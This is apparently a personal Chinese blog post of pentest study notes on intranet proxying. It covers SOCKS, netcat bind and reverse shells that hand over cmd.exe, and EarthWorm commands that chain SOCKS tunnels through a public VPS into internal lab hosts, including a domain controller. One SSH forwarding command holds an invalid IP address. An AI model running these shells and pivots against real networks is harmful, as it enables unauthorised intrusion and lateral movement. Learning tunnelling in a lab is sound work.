内网流量代理

Posted by Azeril on July 22, 2024

参考链接:https://blog.51cto.com/search/user?uid=16169749&q=%E5%86%85%E7%BD%91%E9%9A%A7%E9%81%93

1.1、前言

感觉自己流量代理转发掌握的不太好重新看一遍

1.2、正向反向代理

正向代理,Proxy和Client同属于一个区域,对server是透明的。

(挂梯子) 反向代理:一般情况下,防火墙肯定不能让外网机器随便访问地访问内网机器,所以就提出反向代理。

1.3、Socks协议

中文意思:防火墙安全会话转换协议,工作在OSI参考模型的第五层(会话层)

image-20240723144854867

因为Socks介于传输层与表示层之间,使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层相关服务。

目前有两个版本:SOCKS4和SOCKS5

SOCKS4支持TELNET、FTPHTTP等TCP协议;

SOCKS5支持TCP与UDP,并支持安全认证方案。

Ps: Socks不支持ICMP,不能使用ping命令。。记住哦~~~

1.4、Natcat

正向连接

nc -l -p 5555 -t -e cmd.exe 受害 nc -nvv 192.168.153.138 5555 攻击

反向连接

nc -lp 5555 攻击 nc -t -e cmd 192.168.153.140 5555 受害

1.5、Earthworm+Proxychains

该工具借用了 ssocks 和 lcx.exe 的操作逻辑,并进行更多的功能强化。

目前工具提供六种链路状态,可通过 -s 参数进行选定,分别为:

ssocksd rcsocks rssocks

lcx_slave lcx_tran lcx_listen

其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理。

其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。

lcx 类别管道:

lcx_slave 该管道一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。

lcx_tran 该管道,通过监听本地端口接收代理请求,并转交给代理提供主机。

lcx_listen 该管道,通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机。

通过组合lcx类别管道的特性,可以实现多层内网环境下的渗透测试。

正向SOCKS5服务器(前提:有公网IP)

/ew_for_Win.exe -s ssocksd -l 8888    #受害者主机
然后用proxifier进行连接

然后用kali连接监听的这里proxychains curl说明通了

image-20240729221550490

image-20240729221624497

反弹SOCKS5服务器

web: 10.10.10.80   192.168.236.202
PC: 10.10.10.201   192.168.236.201
DC: 10.10.10.10
kali: 192.168.236.130
    
通过 web 192.168.236.202做跳板机然后用

在web主机上执行:ew_for_win.exe -s rcsocks -l 1080 -e 8888,意思是在我们公网VPS上添加一个转接隧道,把1080端口收到的代理请求转交给8888端口

image-20240729223103380

在目标主机DC上启动SOCKS5服务 并反弹到公网主机的8888端口

ew_for_Win.exe -s rssocks -d 10.10.10.80 -e 8888

二级网络环境(有公网IP)

image-20240729224934303

二级网络环境(无公网IPA 利用lcx_slave方式连接)

image-20240729225339828

这次操作有四步:

1.在公网vps(45.xxx.xxx.72)添加转接隧道,将10800端口收到的代理请求转交给8888端口

./ew_for_linux64 -s lcx_listen -l 10800 -e 8888

img

2.B主机(192.168.153.138)主机正向开启8888端口

./ew_for_Win.exe -s ssocksd -l 9999

img

3.A主机利用lcx_slave方式,将公网VPS的888端口和B主机的999端口连接起来

./ew_for_Win.exe -s lcx_slave -d 45.xxx.xxx.72 -e 8888 -f 192.168.153.138 -g 9999

img

现在MyPC可通过访问45.xxx.xxx.72:10800来使用192.168.153.138主机提供的socks5代理,代理成功,vps会有rssocks cmd_socket OK!提示

img

img

SSH

web: 10.10.10.80   192.168.236.202
PC: 10.10.10.201   192.168.236.201
DC: 10.10.10.10
kali: 192.168.236.130

ssh -CfNg -L 3333:192.168.236.7001:3389 192.168.236.1


Creative Commons License
本作品采用CC BY-NC-ND 4.0进行许可。转载,请注明原作者 Azeril 及本文源链接。